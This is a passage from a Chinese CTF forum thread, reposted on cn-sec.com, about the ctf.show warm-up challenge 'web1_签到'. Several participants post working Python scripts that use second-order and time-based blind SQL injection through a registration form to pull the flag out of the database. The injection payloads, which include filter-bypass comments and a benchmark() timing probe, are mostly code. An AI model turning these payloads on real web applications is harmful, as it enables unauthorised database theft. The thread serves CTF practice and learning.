web1_签到

admin 2022年1月5日23:13:38CTF专场评论10 views3261字阅读10分52秒阅读模式

>

### id="flarum-content">

web1_签到

y1ngy1ngy1ng

import requests
import re

url = "https://3ff49635-7092-4ee3-9be9-041d0b2d629b.chall.ctf.show"
register = "/register.php"
login = "/login.php"
flag = ""
e = 0
# test{}@66.com
# 0'+(select substr(hex(hex((select * from flag))) from {} for 10))+'0

for i in range(1,1000,10):
    s = requests.Session()
    data = {"e": "", "u": "", "p": "test"}
    data["e"] = str(e)+"@aa.com"
    e += 1
    data["u"] = "0'+(select/**/substr(hex(hex((select/**/*/**/from/**/flag)))/**/from/**/{}/**/for/**/10))+'0".format(i)
    s.post(url=url+register,data=data)
    del data['u']
    s.post(url=url + login, data=data).text
    # print(s.post(url=url+login,data=data).text)

    text = s.get(url+"/user.php").text
    # print(text)
    flag += re.search("[0-9]{7,10}", text).group()
    print(flag)

# 666C61677B65323935343837662D313362392D343665392D626338632D3530303830336435303234307D
# 转两次16进制得flag{e295487f-13b9-46e9-bc8c-500803d50240}

y1ngy1ngy1ng

[网鼎杯2018]Unfinish 差不多的题


admin

对的,题目做为签到练手题,大佬牛皮


cop

借楼交流一下另一种解法

import requests
import time
i=1
n=2
flag=""
for i in range(42,44):
    print(i)
    m=64
    j=64
    for q in range(1,8):
        if q!=1:
            j=j/2
            if n==1:
                m=m+j
            elif n==0:
                m=m-j
        m=int(m)
        #exp="0'/**/or/**/(select/**/case/**/when(ord(substr((select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()),{},1))>{})then(1)else(benchmark(5000000,sha(1)))end)/**/or/**/'0".format(i,m)
        #flag
        #exp="0'/**/or/**/(select/**/case/**/when(ord(substr((select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name='flag'),{},1))>{})then(1)else(benchmark(5000000,sha(1)))end)/**/or/**/'0".format(i,m)
        #flag
        exp="0'/**/or/**/(select/**/case/**/when(ord(substr((select/**/group_concat(flag)from/**/flag),{},1))>{})then(1)else(benchmark(5000000,sha(1)))end)/**/or/**/'0".format(i,m)
        #exp="or if(ascii(substr(username,{},1)) > {},1,sleep(2))#".format(i,m)
        data={"e":"cop\x40qq.com",
              "u":exp,
              "p":"123456"
              }
        url="https://fb01744a-0f92-44b7-8f74-fcaf576c1836.chall.ctf.show/register.php"
        startTime=time.time()
        p=requests.post(url,data=data,timeout=100)
        #print(p.status_code)
        print(m)
        #print(exp)
        #print(time.time()-startTime)
        if time.time()-startTime<2:
            n=1
        else:
            n=0
        if q==7:
            if time.time()-startTime<2:
                flag=flag+chr(m+1)
            else:
                flag=flag+chr(m)
            print(flag)

cop

4.txt2kB


_yu_

import requests
import re
url1 = "https://f61d3939-d164-4eb5-b3ea-9281cc8447c4.chall.ctf.show/register.php"
url2 = "https://f61d3939-d164-4eb5-b3ea-9281cc8447c4.chall.ctf.show/login.php"
flag=''
for i in range(1,50):
    payload="hex(hex(substr((select/**/flag/**/from/**/flag)from/**/"+str(i)+"/**/for/**/1))),/*"
    #print(payload)
    s=requests.session()
    data1={
        'e':str(i+30)+"',username="+payload,
        'u':"*/#",
        'p':i+30
        }
    #print(data1['e'])
    r1 = s.post(url1,data=data1)  
    data2={
        'e':i+30,
        'p':i+30
        }
    r2=s.post(url2,data=data2)
    t =r2.text
    real = re.findall("Hello (.*?),",t)[0]
    flag+=real
    print(flag)

y1ngy1ngy1ng

_yu_ 羽师傅tql


yuchoxuuan

大佬们太强了,我是一位一位出的,把自己蠢哭

def web1():
    u='https://07072526-0de4-4111-bc00-b7db08462871.chall.ctf.show/'
    ur=u+'register.php'
    ul=u+'login.php'
    def check(i = 1):
        un = '[email protected]%d'%i
        pl={'e':un,
            'u':"0'+(select/**/ord(substr(flag,%d,1))from/**/flag)+'0"%i,
            'p':'1'}
        hf.post(ur,pl)
        txt = hf.post(ul,pl)
        co= txt[txt.index('Hello ')+len('Hello '):txt.index(',')]
        print(chr(int(co,base=10)),end='')
    for r in range(0,48):
        check(r+1)

y1ngy1ngy1ng

yuchoxuuan 羽师傅的一下就出了 tql


yuchoxuuan

y1ngy1ngy1ng
所以说我把自己蠢哭了啊。。。羽师傅太强了


langzi

yuchoxuuan 正常的select,把查到的数据两次hex,十位十位的存入username,访问login正则出来


特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月5日23:13:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  web1_签到 http://cn-sec.com/archives/720117.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: